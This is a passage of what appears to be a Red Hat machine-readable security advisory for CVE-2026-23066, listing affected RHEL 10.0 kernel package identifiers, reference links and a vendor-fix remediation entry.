"RT-10.0.Z.E2S:kernel-abi-stablelists-0:6.12.0-55.69.1.el10_0.noarch",
"RT-10.0.Z.E2S:kernel-core-0:6.12.0-55.69.1.el10_0.aarch64",
"RT-10.0.Z.E2S:kernel-core-0:6.12.0-55.69.1.el10_0.ppc64le",
"RT-10.0.Z.E2S:kernel-core-0:6.12.0-55.69.1.el10_0.s390x",
"RT-10.0.Z.E2S:kernel-core-0:6.12.0-55.69.1.el10_0.x86_64",
"RT-10.0.Z.E2S:kernel-debug-0:6.12.0-55.69.1.el10_0.aarch64",
"RT-10.0.Z.E2S:kernel-debug-0:6.12.0-55.69.1.el10_0.ppc64le",
"RT-10.0.Z.E2S:kernel-debug-0:6.12.0-55.69.1.el10_0.s390x",
"RT-10.0.Z.E2S:kernel-debug-0:6.12.0-55.69.1.el10_0.x86_64",
"RT-10.0.Z.E2S:kernel-debug-core-0:6.12.0-55.69.1.el10_0.aarch64",
"RT-10.0.Z.E2S:kernel-debug-core-0:6.12.0-55.69.1.el10_0.ppc64le",
"RT-10.0.Z.E2S:kernel-debug-core-0:6.12.0-55.69.1.el10_0.s390x",
"RT-10.0.Z.E2S:kernel-debug-core-0:6.12.0-55.69.1.el10_0.x86_64",
"RT-10.0.Z.E2S:kernel-debug-debuginfo-0:6.12.0-55.69.1.el10_0.aarch64",
"RT-10.0.Z.E2S:kernel-debug-debuginfo-0:6.12.0-55.69.1.el10_0.ppc64le",
"RT-10.0.Z.E2S:kernel-debug-debuginfo-0:6.12.0-55.69.1.el10_0.s390x",
"RT-10.0.Z.E2S:kernel-debug-debuginfo-0:6.12.0-55.69.1.el10_0.x86_64",
"RT-10.0.Z.E2S:kernel-debug-devel-0:6.12.0-55.69.1.el10_0.aarch64",
"RT-10.0.Z.E2S:kernel-debug-devel-0:6.12.0-55.69.1.el10_0.ppc64le",
"RT-10.0.Z.E2S:kernel-debug-devel-0:6.12.0-55.69.1.el10_0.s390x",
"RT-10.0.Z.E2S:kernel-debug-devel-0:6.12.0-55.69.1.el10_0.x86_64",
"RT-10.0.Z.E2S:kernel-debug-devel-matched-0:6.12.0-55.69.1.el10_0.aarch64",
"RT-10.0.Z.E2S:kernel-debug-devel-matched-0:6.12.0-55.69.1.el10_0.ppc64le",
"RT-10.0.Z.E2S:kernel-debug-devel-matched-0:6.12.0-55.69.1.el10_0.s390x",
"RT-10.0.Z.E2S:kernel-debug-devel-matched-0:6.12.0-55.69.1.el10_0.x86_64",
"RT-10.0.Z.E2S:kernel-debug-modules-0:6.12.0-55.69.1.el10_0.aarch64",
"RT-10.0.Z.E2S:kernel-debug-modules-0:6.12.0-55.69.1.el10_0.ppc64le",
"RT-10.0.Z.E2S:kernel-debug-modules-0:6.12.0-55.69.1.el10_0.s390x",
"RT-10.0.Z.E2S:kernel-debug-modules-0:6.12.0-55.69.1.el10_0.x86_64",
"RT-10.0.Z.E2S:kernel-debug-modules-core-0:6.12.0-55.69.1.el10_0.aarch64",
"RT-10.0.Z.E2S:kernel-debug-modules-core-0:6.12.0-55.69.1.el10_0.ppc64le",
"RT-10.0.Z.E2S:kernel-debug-modules-core-0:6.12.0-55.69.1.el10_0.s390x",
"RT-10.0.Z.E2S:kernel-debug-modules-core-0:6.12.0-55.69.1.el10_0.x86_64",
"RT-10.0.Z.E2S:kernel-debug-modules-extra-0:6.12.0-55.69.1.el10_0.aarch64",
"RT-10.0.Z.E2S:kernel-debug-modules-extra-0:6.12.0-55.69.1.el10_0.ppc64le",
"RT-10.0.Z.E2S:kernel-debug-modules-extra-0:6.12.0-55.69.1.el10_0.s390x",
"RT-10.0.Z.E2S:kernel-debug-modules-extra-0:6.12.0-55.69.1.el10_0.x86_64",
"RT-10.0.Z.E2S:kernel-debug-uki-virt-0:6.12.0-55.69.1.el10_0.x86_64",
"RT-10.0.Z.E2S:kernel-debuginfo-0:6.12.0-55.69.1.el10_0.aarch64",
"RT-10.0.Z.E2S:kernel-debuginfo-0:6.12.0-55.69.1.el10_0.ppc64le",
"RT-10.0.Z.E2S:kernel-debuginfo-0:6.12.0-55.69.1.el10_0.s390x",
"RT-10.0.Z.E2S:kernel-debuginfo-0:6.12.0-55.69.1.el10_0.x86_64",
"RT-10.0.Z.E2S:kernel-debuginfo-common-aarch64-0:6.12.0-55.69.1.el10_0.aarch64",
"RT-10.0.Z.E2S:kernel-debuginfo-common-ppc64le-0:6.12.0-55.69.1.el10_0.ppc64le",
"RT-10.0.Z.E2S:kernel-debuginfo-common-s390x-0:6.12.0-55.69.1.el10_0.s390x",
"RT-10.0.Z.E2S:kernel-debuginfo-common-x86_64-0:6.12.0-55.69.1.el10_0.x86_64",
"RT-10.0.Z.E2S:kernel-devel-0:6.12.0-55.69.1.el10_0.aarch64",
"RT-10.0.Z.E2S:kernel-devel-0:6.12.0-55.69.1.el10_0.ppc64le",
"RT-10.0.Z.E2S:kernel-devel-0:6.12.0-55.69.1.el10_0.s390x",
"RT-10.0.Z.E2S:kernel-devel-0:6.12.0-55.69.1.el10_0.x86_64",
"RT-10.0.Z.E2S:kernel-devel-matched-0:6.12.0-55.69.1.el10_0.aarch64",
"RT-10.0.Z.E2S:kernel-devel-matched-0:6.12.0-55.69.1.el10_0.ppc64le",
"RT-10.0.Z.E2S:kernel-devel-matched-0:6.12.0-55.69.1.el10_0.s390x",
"RT-10.0.Z.E2S:kernel-devel-matched-0:6.12.0-55.69.1.el10_0.x86_64",
"RT-10.0.Z.E2S:kernel-doc-0:6.12.0-55.69.1.el10_0.noarch",
"RT-10.0.Z.E2S:kernel-modules-0:6.12.0-55.69.1.el10_0.aarch64",
"RT-10.0.Z.E2S:kernel-modules-0:6.12.0-55.69.1.el10_0.ppc64le",
"RT-10.0.Z.E2S:kernel-modules-0:6.12.0-55.69.1.el10_0.s390x",
"RT-10.0.Z.E2S:kernel-modules-0:6.12.0-55.69.1.el10_0.x86_64",
"RT-10.0.Z.E2S:kernel-modules-core-0:6.12.0-55.69.1.el10_0.aarch64",
"RT-10.0.Z.E2S:kernel-modules-core-0:6.12.0-55.69.1.el10_0.ppc64le",
"RT-10.0.Z.E2S:kernel-modules-core-0:6.12.0-55.69.1.el10_0.s390x",
"RT-10.0.Z.E2S:kernel-modules-core-0:6.12.0-55.69.1.el10_0.x86_64",
"RT-10.0.Z.E2S:kernel-modules-extra-0:6.12.0-55.69.1.el10_0.aarch64",
"RT-10.0.Z.E2S:kernel-modules-extra-0:6.12.0-55.69.1.el10_0.ppc64le",
"RT-10.0.Z.E2S:kernel-modules-extra-0:6.12.0-55.69.1.el10_0.s390x",
"RT-10.0.Z.E2S:kernel-modules-extra-0:6.12.0-55.69.1.el10_0.x86_64",
"RT-10.0.Z.E2S:kernel-rt-0:6.12.0-55.69.1.el10_0.aarch64",
"RT-10.0.Z.E2S:kernel-rt-0:6.12.0-55.69.1.el10_0.x86_64",
"RT-10.0.Z.E2S:kernel-rt-64k-0:6.12.0-55.69.1.el10_0.aarch64",
"RT-10.0.Z.E2S:kernel-rt-64k-core-0:6.12.0-55.69.1.el10_0.aarch64",
"RT-10.0.Z.E2S:kernel-rt-64k-debug-0:6.12.0-55.69.1.el10_0.aarch64",
"RT-10.0.Z.E2S:kernel-rt-64k-debug-core-0:6.12.0-55.69.1.el10_0.aarch64",
"RT-10.0.Z.E2S:kernel-rt-64k-debug-debuginfo-0:6.12.0-55.69.1.el10_0.aarch64",
"RT-10.0.Z.E2S:kernel-rt-64k-debug-devel-0:6.12.0-55.69.1.el10_0.aarch64",
"RT-10.0.Z.E2S:kernel-rt-64k-debug-modules-0:6.12.0-55.69.1.el10_0.aarch64",
"RT-10.0.Z.E2S:kernel-rt-64k-debug-modules-core-0:6.12.0-55.69.1.el10_0.aarch64",
"RT-10.0.Z.E2S:kernel-rt-64k-debug-modules-extra-0:6.12.0-55.69.1.el10_0.aarch64",
"RT-10.0.Z.E2S:kernel-rt-64k-debuginfo-0:6.12.0-55.69.1.el10_0.aarch64",
"RT-10.0.Z.E2S:kernel-rt-64k-devel-0:6.12.0-55.69.1.el10_0.aarch64",
"RT-10.0.Z.E2S:kernel-rt-64k-modules-0:6.12.0-55.69.1.el10_0.aarch64",
"RT-10.0.Z.E2S:kernel-rt-64k-modules-core-0:6.12.0-55.69.1.el10_0.aarch64",
"RT-10.0.Z.E2S:kernel-rt-64k-modules-extra-0:6.12.0-55.69.1.el10_0.aarch64",
"RT-10.0.Z.E2S:kernel-rt-core-0:6.12.0-55.69.1.el10_0.aarch64",
"RT-10.0.Z.E2S:kernel-rt-core-0:6.12.0-55.69.1.el10_0.x86_64",
"RT-10.0.Z.E2S:kernel-rt-debug-0:6.12.0-55.69.1.el10_0.aarch64",
"RT-10.0.Z.E2S:kernel-rt-debug-0:6.12.0-55.69.1.el10_0.x86_64",
"RT-10.0.Z.E2S:kernel-rt-debug-core-0:6.12.0-55.69.1.el10_0.aarch64",
"RT-10.0.Z.E2S:kernel-rt-debug-core-0:6.12.0-55.69.1.el10_0.x86_64",
"RT-10.0.Z.E2S:kernel-rt-debug-debuginfo-0:6.12.0-55.69.1.el10_0.aarch64",
"RT-10.0.Z.E2S:kernel-rt-debug-debuginfo-0:6.12.0-55.69.1.el10_0.x86_64",
"RT-10.0.Z.E2S:kernel-rt-debug-devel-0:6.12.0-55.69.1.el10_0.aarch64",
"RT-10.0.Z.E2S:kernel-rt-debug-devel-0:6.12.0-55.69.1.el10_0.x86_64",
"RT-10.0.Z.E2S:kernel-rt-debug-kvm-0:6.12.0-55.69.1.el10_0.x86_64",
"RT-10.0.Z.E2S:kernel-rt-debug-modules-0:6.12.0-55.69.1.el10_0.aarch64",
"RT-10.0.Z.E2S:kernel-rt-debug-modules-0:6.12.0-55.69.1.el10_0.x86_64",
"RT-10.0.Z.E2S:kernel-rt-debug-modules-core-0:6.12.0-55.69.1.el10_0.aarch64",
"RT-10.0.Z.E2S:kernel-rt-debug-modules-core-0:6.12.0-55.69.1.el10_0.x86_64",
"RT-10.0.Z.E2S:kernel-rt-debug-modules-extra-0:6.12.0-55.69.1.el10_0.aarch64",
"RT-10.0.Z.E2S:kernel-rt-debug-modules-extra-0:6.12.0-55.69.1.el10_0.x86_64",
"RT-10.0.Z.E2S:kernel-rt-debuginfo-0:6.12.0-55.69.1.el10_0.aarch64",
"RT-10.0.Z.E2S:kernel-rt-debuginfo-0:6.12.0-55.69.1.el10_0.x86_64",
"RT-10.0.Z.E2S:kernel-rt-devel-0:6.12.0-55.69.1.el10_0.aarch64",
"RT-10.0.Z.E2S:kernel-rt-devel-0:6.12.0-55.69.1.el10_0.x86_64",
"RT-10.0.Z.E2S:kernel-rt-kvm-0:6.12.0-55.69.1.el10_0.x86_64",
"RT-10.0.Z.E2S:kernel-rt-modules-0:6.12.0-55.69.1.el10_0.aarch64",
"RT-10.0.Z.E2S:kernel-rt-modules-0:6.12.0-55.69.1.el10_0.x86_64",
"RT-10.0.Z.E2S:kernel-rt-modules-core-0:6.12.0-55.69.1.el10_0.aarch64",
"RT-10.0.Z.E2S:kernel-rt-modules-core-0:6.12.0-55.69.1.el10_0.x86_64",
"RT-10.0.Z.E2S:kernel-rt-modules-extra-0:6.12.0-55.69.1.el10_0.aarch64",
"RT-10.0.Z.E2S:kernel-rt-modules-extra-0:6.12.0-55.69.1.el10_0.x86_64",
"RT-10.0.Z.E2S:kernel-tools-0:6.12.0-55.69.1.el10_0.aarch64",
"RT-10.0.Z.E2S:kernel-tools-0:6.12.0-55.69.1.el10_0.ppc64le",
"RT-10.0.Z.E2S:kernel-tools-0:6.12.0-55.69.1.el10_0.s390x",
"RT-10.0.Z.E2S:kernel-tools-0:6.12.0-55.69.1.el10_0.x86_64",
"RT-10.0.Z.E2S:kernel-tools-debuginfo-0:6.12.0-55.69.1.el10_0.aarch64",
"RT-10.0.Z.E2S:kernel-tools-debuginfo-0:6.12.0-55.69.1.el10_0.ppc64le",
"RT-10.0.Z.E2S:kernel-tools-debuginfo-0:6.12.0-55.69.1.el10_0.s390x",
"RT-10.0.Z.E2S:kernel-tools-debuginfo-0:6.12.0-55.69.1.el10_0.x86_64",
"RT-10.0.Z.E2S:kernel-tools-libs-0:6.12.0-55.69.1.el10_0.aarch64",
"RT-10.0.Z.E2S:kernel-tools-libs-0:6.12.0-55.69.1.el10_0.ppc64le",
"RT-10.0.Z.E2S:kernel-tools-libs-0:6.12.0-55.69.1.el10_0.x86_64",
"RT-10.0.Z.E2S:kernel-tools-libs-devel-0:6.12.0-55.69.1.el10_0.aarch64",
"RT-10.0.Z.E2S:kernel-tools-libs-devel-0:6.12.0-55.69.1.el10_0.ppc64le",
"RT-10.0.Z.E2S:kernel-tools-libs-devel-0:6.12.0-55.69.1.el10_0.x86_64",
"RT-10.0.Z.E2S:kernel-uki-virt-0:6.12.0-55.69.1.el10_0.aarch64",
"RT-10.0.Z.E2S:kernel-uki-virt-0:6.12.0-55.69.1.el10_0.x86_64",
"RT-10.0.Z.E2S:kernel-uki-virt-addons-0:6.12.0-55.69.1.el10_0.aarch64",
"RT-10.0.Z.E2S:kernel-uki-virt-addons-0:6.12.0-55.69.1.el10_0.x86_64",
"RT-10.0.Z.E2S:kernel-zfcpdump-0:6.12.0-55.69.1.el10_0.s390x",
"RT-10.0.Z.E2S:kernel-zfcpdump-core-0:6.12.0-55.69.1.el10_0.s390x",
"RT-10.0.Z.E2S:kernel-zfcpdump-debuginfo-0:6.12.0-55.69.1.el10_0.s390x",
"RT-10.0.Z.E2S:kernel-zfcpdump-devel-0:6.12.0-55.69.1.el10_0.s390x",
"RT-10.0.Z.E2S:kernel-zfcpdump-devel-matched-0:6.12.0-55.69.1.el10_0.s390x",
"RT-10.0.Z.E2S:kernel-zfcpdump-modules-0:6.12.0-55.69.1.el10_0.s390x",
"RT-10.0.Z.E2S:kernel-zfcpdump-modules-core-0:6.12.0-55.69.1.el10_0.s390x",
"RT-10.0.Z.E2S:kernel-zfcpdump-modules-extra-0:6.12.0-55.69.1.el10_0.s390x",
"RT-10.0.Z.E2S:libperf-0:6.12.0-55.69.1.el10_0.aarch64",
"RT-10.0.Z.E2S:libperf-0:6.12.0-55.69.1.el10_0.ppc64le",
"RT-10.0.Z.E2S:libperf-0:6.12.0-55.69.1.el10_0.s390x",
"RT-10.0.Z.E2S:libperf-0:6.12.0-55.69.1.el10_0.x86_64",
"RT-10.0.Z.E2S:libperf-debuginfo-0:6.12.0-55.69.1.el10_0.aarch64",
"RT-10.0.Z.E2S:libperf-debuginfo-0:6.12.0-55.69.1.el10_0.ppc64le",
"RT-10.0.Z.E2S:libperf-debuginfo-0:6.12.0-55.69.1.el10_0.s390x",
"RT-10.0.Z.E2S:libperf-debuginfo-0:6.12.0-55.69.1.el10_0.x86_64",
"RT-10.0.Z.E2S:perf-0:6.12.0-55.69.1.el10_0.aarch64",
"RT-10.0.Z.E2S:perf-0:6.12.0-55.69.1.el10_0.ppc64le",
"RT-10.0.Z.E2S:perf-0:6.12.0-55.69.1.el10_0.s390x",
"RT-10.0.Z.E2S:perf-0:6.12.0-55.69.1.el10_0.x86_64",
"RT-10.0.Z.E2S:perf-debuginfo-0:6.12.0-55.69.1.el10_0.aarch64",
"RT-10.0.Z.E2S:perf-debuginfo-0:6.12.0-55.69.1.el10_0.ppc64le",
"RT-10.0.Z.E2S:perf-debuginfo-0:6.12.0-55.69.1.el10_0.s390x",
"RT-10.0.Z.E2S:perf-debuginfo-0:6.12.0-55.69.1.el10_0.x86_64",
"RT-10.0.Z.E2S:python3-perf-0:6.12.0-55.69.1.el10_0.aarch64",
"RT-10.0.Z.E2S:python3-perf-0:6.12.0-55.69.1.el10_0.ppc64le",
"RT-10.0.Z.E2S:python3-perf-0:6.12.0-55.69.1.el10_0.s390x",
"RT-10.0.Z.E2S:python3-perf-0:6.12.0-55.69.1.el10_0.x86_64",
"RT-10.0.Z.E2S:python3-perf-debuginfo-0:6.12.0-55.69.1.el10_0.aarch64",
"RT-10.0.Z.E2S:python3-perf-debuginfo-0:6.12.0-55.69.1.el10_0.ppc64le",
"RT-10.0.Z.E2S:python3-perf-debuginfo-0:6.12.0-55.69.1.el10_0.s390x",
"RT-10.0.Z.E2S:python3-perf-debuginfo-0:6.12.0-55.69.1.el10_0.x86_64",
"RT-10.0.Z.E2S:rtla-0:6.12.0-55.69.1.el10_0.aarch64",
"RT-10.0.Z.E2S:rtla-0:6.12.0-55.69.1.el10_0.ppc64le",
"RT-10.0.Z.E2S:rtla-0:6.12.0-55.69.1.el10_0.s390x",
"RT-10.0.Z.E2S:rtla-0:6.12.0-55.69.1.el10_0.x86_64",
"RT-10.0.Z.E2S:rv-0:6.12.0-55.69.1.el10_0.aarch64",
"RT-10.0.Z.E2S:rv-0:6.12.0-55.69.1.el10_0.ppc64le",
"RT-10.0.Z.E2S:rv-0:6.12.0-55.69.1.el10_0.s390x",
"RT-10.0.Z.E2S:rv-0:6.12.0-55.69.1.el10_0.x86_64"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2026-23066"
},
{
"category": "external",
"summary": "RHBZ#2436805",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2436805"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2026-23066",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-23066"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2026-23066",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-23066"
},
{
"category": "external",
"summary": "https://lore.kernel.org/linux-cve-announce/2026020416-CVE-2026-23066-8e44@gregkh/T",
"url": "https://lore.kernel.org/linux-cve-announce/2026020416-CVE-2026-23066-8e44@gregkh/T"
}
],
"release_date": "2026-02-04T00:00:00+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2026-04-20T18:30:02+00:00",
"details": "For details on how to apply this update, which includes the changes described in this advisory, refer to:\n\nhttps://access.redhat.com/articles/11258\n\nThe system must be rebooted for this update to take effect.",
"product_ids": [
"AppStream-10.0.Z.E2S:kernel-0:6.12.0-55.69.1.el10_0.aarch64",
"AppStream-10.0.Z.E2S:kernel-0:6.12.0-55.69.1.el10_0.ppc64le",
"AppStream-10.0.Z.E2S:kernel-0:6.12.0-55.69.1.el10_0.s390x",
"AppStream-10.0.Z.E2S:kernel-0:6.12.0-55.69.1.el10_0.src",
"AppStream-10.0.Z.E2S:kernel-0:6.12.0-55.69.1.el10_0.x86_64",
"AppStream-10.0.Z.E2S:kernel-64k-0:6.12.0-55.69.1.el10_0.aarch64",
"AppStream-10.0.Z.E2S:kernel-64k-core-0:6.12.0-55.69.1.el10_0.aarch64",
"AppStream-10.0.Z.E2S:kernel-64k-debug-0:6.12.0-55.69.1.el10_0.aarch64",
"AppStream-10.0.Z.E2S:kernel-64k-debug-core-0:6.12.0-55.69.1.el10_0.aarch64",
"AppStream-10.0.Z.E2S:kernel-64k-debug-debuginfo-0:6.12.0-55.69.1.el10_0.aarch64",
"AppStream-10.0.Z.E2S:kernel-64k-debug-devel-0:6.12.0-55.69.1.el10_0.aarch64",
"AppStream-10.0.Z.E2S:kernel-64k-debug-devel-matched-0:6.12.0-55.69.1.el10_0.aarch64",
"AppStream-10.0.Z.E2S:kernel-64k-debug-modules-0:6.12.0-55.69.1.el10_0.aarch64",
"AppStream-10.0.Z.E2S:kernel-64k-debug-modules-core-0:6.12.0-55.69.1.el10_0.aarch64",
"AppStream-10.0.Z.E2S:kernel-64k-debug-modules-extra-0:6.12.0-55.69.1.el10_0.aarch64",
"AppStream-10.0.Z.E2S:kernel-64k-debuginfo-0:6.12.0-55.69.1.el10_0.aarch64",
"AppStream-10.0.Z.E2S:kernel-64k-devel-0:6.12.0-55.69.1.el10_0.aarch64",
"AppStream-10.0.Z.E2S:kernel-64k-devel-matched-0:6.12.0-55.69.1.el10_0.aarch64",
"AppStream-10.0.Z.E2S:kernel-64k-modules-0:6.12.0-55.69.1.el10_0.aarch64",
"AppStream-10.0.Z.E2S:kernel-64k-modules-core-0:6.12.0-55.69.1.el10_0.aarch64",
"AppStream-10.0.Z.E2S:kernel-64k-modules-extra-0:6.12.0-55.69.1.el10_0.aarch64",
"AppStream-10.0.Z.E2S:kernel-abi-stablelists-0:6.12.0-55.69.1.el10_0.noarch",
"AppStream-10.0.Z.E2S:kernel-core-0:6.12.0-55.69.1.el10_0.aarch64",
"AppStream-10.0.Z.E2S:kernel-core-0:6.12.0-55.69.1.el10_0.ppc64le",
"AppStream-10.0.Z.E2S:kernel-core-0:6.12.0-55.69.1.el10_0.s390x",
"AppStream-10.0.Z.E2S:kernel-core-0:6.12.0-55.69.1.el10_0.x86_64",
"AppStream-10.0.Z.E2S:kernel-debug-0:6.12.0-55.69.1.el10_0.aarch64",
"AppStream-10.0.Z.E2S:kernel-debug-0:6.12.0-55.69.1.el10_0.ppc64le",
"AppStream-10.0.Z.E2S:kernel-debug-0:6.12.0-55.69.1.el10_0.s390x",
"AppStream-10.0.Z.E2S:kernel-debug-0:6.12.0-55.69.1.el10_0.x86_64",
"AppStream-10.0.Z.E2S:kernel-debug-core-0:6.12.0-55.69.1.el10_0.aarch64",
"AppStream-10.0.Z.E2S:kernel-debug-core-0:6.12.0-55.69.1.el10_0.ppc64le",
"AppStream-10.0.Z.E2S:kernel-debug-core-0:6.12.0-55.69.1.el10_0.s390x",
"AppStream-10.0.Z.E2S:kernel-debug-core-0:6.12.0-55.69.1.el10_0.x86_64",
"AppStream-10.0.Z.E2S:kernel-debug-debuginfo-0:6.12.0-55.69.1.el10_0.aarch64",
"AppStream-10.0.Z.E2S:kernel-debug-debuginfo-0:6.12.0-55.69.1.el10_0.ppc64le",
"AppStream-10.0.Z.E2S:kernel-debug-debuginfo-0:6.12.0-55.69.1.el10_0.s390x",
"AppStream-10.0.Z.E2S:kernel-debug-debuginfo-0:6.12.0-55.69.1.el10_0.x86_64",
"AppStream-10.0.Z.E2S:kernel-debug-devel-0:6.12.0-55.69.1.el10_0.aarch64",
"AppStream-10.0.Z.E2S:kernel-debug-devel-0:6.12.0-55.69.1.el10_0.ppc64le",
"AppStream-10.0.Z.E2S:kernel-debug-devel-0:6.12.0-55.69.1.el10_0.s390x",
"AppStream-10.0.Z.E2S:kernel-debug-devel-0:6.12.0-55.69.1.el10_0.x86_64",
"AppStream-10.0.Z.E2S:kernel-debug-devel-matched-0:6.12.0-55.69.1.el10_0.aarch64",
"AppStream-10.0.Z.E2S:kernel-debug-devel-matched-0:6.12.0-55.69.1.el10_0.ppc64le",
"AppStream-10.0.Z.E2S:kernel-debug-devel-matched-0:6.12.0-55.69.1.el10_0.s390x",
"AppStream-10.0.Z.E2S:kernel-debug-devel-matched-0:6.12.0-55.69.1.el10_0.x86_64",
"AppStream-10.0.Z.E2S:kernel-debug-modules-0:6.12.0-55.69.1.el10_0.aarch64",
"AppStream-10.0.Z.E2S:kernel-debug-modules-0:6.12.0-55.69.1.el10_0.ppc64le",
"AppStream-10.0.Z.E2S:kernel-debug-modules-0:6.12.0-55.69.1.el10_0.s390x",
"AppStream-10.0.Z.E2S:kernel-debug-modules-0:6.12.0-55.69.1.el10_0.x86_64",
"AppStream-10.0.Z.E2S:kernel-debug-modules-core-0:6.12.0-55.69.1.el10_0.aarch64",
"AppStream-10.0.Z.E2S:kernel-debug-modules-core-0:6.12.0-55.69.1.el10_0.ppc64le",
"AppStream-10.0.Z.E2S:kernel-debug-modules-core-0:6.12.0-55.69.1.el10_0.s390x",
"AppStream-10.0.Z.E2S:kernel-debug-modules-core-0:6.12.0-55.69.1.el10_0.x86_64",
"AppStream-10.0.Z.E2S:kernel-debug-modules-extra-0:6.12.0-55.69.1.el10_0.aarch64",
"AppStream-10.0.Z.E2S:kernel-debug-modules-extra-0:6.12.0-55.69.1.el10_0.ppc64le",
"AppStream-10.0.Z.E2S:kernel-debug-modules-extra-0:6.12.0-55.69.1.el10_0.s390x",
"AppStream-10.0.Z.E2S:kernel-debug-modules-extra-0:6.12.0-55.69.1.el10_0.x86_64",
"AppStream-10.0.Z.E2S:kernel-debug-uki-virt-0:6.12.0-55.69.1.el10_0.x86_64",
"AppStream-10.0.Z.E2S:kernel-debuginfo-0:6.12.0-55.69.1.el10_0.aarch64",
"AppStream-10.0.Z.E2S:kernel-debuginfo-0:6.12.0-55.69.1.el10_0.ppc64le",
"AppStream-10.0.Z.E2S:kernel-debuginfo-0:6.12.0-55.69.1.el10_0.s390x",
"AppStream-10.0.Z.E2S:kernel-debuginfo-0:6.12.0-55.69.1.el10_0.x86_64",
"AppStream-10.0.Z.E2S:kernel-debuginfo-common-aarch64-0:6.12.0-55.69.1.el10_0.aarch64",
"AppStream-10.0.Z.E2S:kernel-debuginfo-common-ppc64le-0:6.12.0-55.69.1.el10_0.ppc64le",
"AppStream-10.0.Z.E2S:kernel-debuginfo-common-s390x-0:6.12.0-55.69.1.el10_0.s390x",
"AppStream-10.0.Z.E2S:kernel-debuginfo-common-x86_64-0:6.12.0-55.69.1.el10_0.x86_64",
"AppStream-10.0.Z.E2S:kernel-devel-0:6.12.0-55.69.1.el10_0.aarch64",
"AppStream-10.0.Z.E2S:kernel-devel-0:6.12.0-55.69.1.el10_0.ppc64le",
"AppStream-10.0.Z.E2S:kernel-devel-0:6.12.0-55.69.1.el10_0.s390x",
"AppStream-10.0.Z.E2S:kernel-devel-0:6.12.0-55.69.1.el10_0.x86_64",
"AppStream-10.0.Z.E2S:kernel-devel-matched-0:6.12.0-55.69.1.el10_0.aarch64",
"AppStream-10.0.Z.E2S:kernel-devel-matched-0:6.12.0-55.69.1.el10_0.ppc64le",
"AppStream-10.0.Z.E2S:kernel-devel-matched-0:6.12.0-55.69.1.el10_0.s390x",
"AppStream-10.0.Z.E2S:kernel-devel-matched-0:6.12.0-55.69.1.el10_0.x86_64",
"AppStream-10.0.Z.E2S:kernel-doc-0:6.12.0-55.69.1.el10_0.noarch",
"AppStream-10.0.Z.E2S:kernel-modules-0:6.12.0-55.69.1.el10_0.aarch64",
"AppStream-10.0.Z.E2S:kernel-modules-0:6.12.0-55.69.1.el10_0.ppc64le",
"AppStream-10.0.Z.E2S:kernel-modules-0:6.12.0-55.69.1.el10_0.s390x",
"AppStream-10.0.Z.E2S:kernel-modules-0:6.12.0-55.69.1.el10_0.x86_64",
"AppStream-10.0.Z.E2S:kernel-modules-core-0:6.12.0-55.69.1.el10_0.aarch64",
"AppStream-10.0.Z.E2S:kernel-modules-core-0:6.12.0-55.69.1.el10_0.ppc64le",
"AppStream-10.0.Z.E2S:kernel-modules-core-0:6.12.0-55.69.1.el10_0.s390x",
"AppStream-10.0.Z.E2S:kernel-modules-core-0:6.12.0-55.69.1.el10_0.x86_64",
"AppStream-10.0.Z.E2S:kernel-modules-extra-0:6.12.0-55.69.1.el10_0.aarch64",
"AppStream-10.0.Z.E2S:kernel-modules-extra-0:6.12.0-55.69.1.el10_0.ppc64le",
"AppStream-10.0.Z.E2S:kernel-modules-extra-0:6.12.0-55.69.1.el10_0.s390x",
"AppStream-10.0.Z.E2S:kernel-modules-extra-0:6.12.0-55.69.1.el10_0.x86_64",
"AppStream-10.0.Z.E2S:kernel-rt-0:6.12.0-55.69.1.el10_0.aarch64",
"AppStream-10.0.Z.E2S:kernel-rt-0:6.12.0-55.69.1.el10_0.x86_64",
"AppStream-10.0.Z.E2S:kernel-rt-64k-0:6.12.0-55.69.1.el10_0.aarch64",
"AppStream-10.0.Z.E2S:kernel-rt-64k-core-0:6.12.0-55.69.1.el10_0.aarch64",
"AppStream-10.0.Z.E2S:kernel-rt-64k-debug-0:6.12.0-55.69.1.el10_0.aarch64",
"AppStream-10.0.Z.E2S:kernel-rt-64k-debug-core-0:6.12.0-55.69.1.el10_0.aarch64",
"AppStream-10.0.Z.E2S:kernel-rt-64k-debug-debuginfo-0:6.12.0-55.69.1.el10_0.aarch64",
"AppStream-10.0.Z.E2S:kernel-rt-64k-debug-devel-0:6.12.0-55.69.1.el10_0.aarch64",
"AppStream-10.0.Z.E2S:kernel-rt-64k-debug-modules-0:6.12.0-55.69.1.el10_0.aarch64",
"AppStream-10.0.Z.E2S:kernel-rt-64k-debug-modules-core-0:6.12.0-55.69.1.el10_0.aarch64",
"AppStream-10.0.Z.E2S:kernel-rt-64k-debug-modules-extra-0:6.12.0-55.69.1.el10_0.aarch64",
"AppStream-10.0.Z.E2S:kernel-rt-64k-debuginfo-0:6.12.0-55.69.1.el10_0.aarch64",
"AppStream-10.0.Z.E2S:kernel-rt-64k-devel-0:6.12.0-55.69.1.el10_0.aarch64",
"AppStream-10.0.Z.E2S:kernel-rt-64k-modules-0:6.12.0-55.69.1.el10_0.aarch64",
"AppStream-10.0.Z.E2S:kernel-rt-64k-modules-core-0:6.12.0-55.69.1.el10_0.aarch64",
"AppStream-10.0.Z.E2S:kernel-rt-64k-modules-extra-0:6.12.0-55.69.1.el10_0.aarch64",
"AppStream-10.0.Z.E2S:kernel-rt-core-0:6.12.0-55.69.1.el10_0.aarch64",
"AppStream-10.0.Z.E2S:kernel-rt-core-0:6.12.0-55.69.1.el10_0.x86_64",
"AppStream-10.0.Z.E2S:kernel-rt-debug-0:6.12.0-55.69.1.el10_0.aarch64",
"AppStream-10.0.Z.E2S:kernel-rt-debug-0:6.12.0-55.69.1.el10_0.x86_64",
"AppStream-10.0.Z.E2S:kernel-rt-debug-core-0:6.12.0-55.69.1.el10_0.aarch64",
"AppStream-10.0.Z.E2S:kernel-rt-debug-core-0:6.12.0-55.69.1.el10_0.x86_64",
"AppStream-10.0.Z.E2S:kernel-rt-debug-debuginfo-0:6.12.0-55.69.1.el10_0.aarch64",
"AppStream-10.0.Z.E2S:kernel-rt-debug-debuginfo-0:6.12.0-55.69.1.el10_0.x86_64",
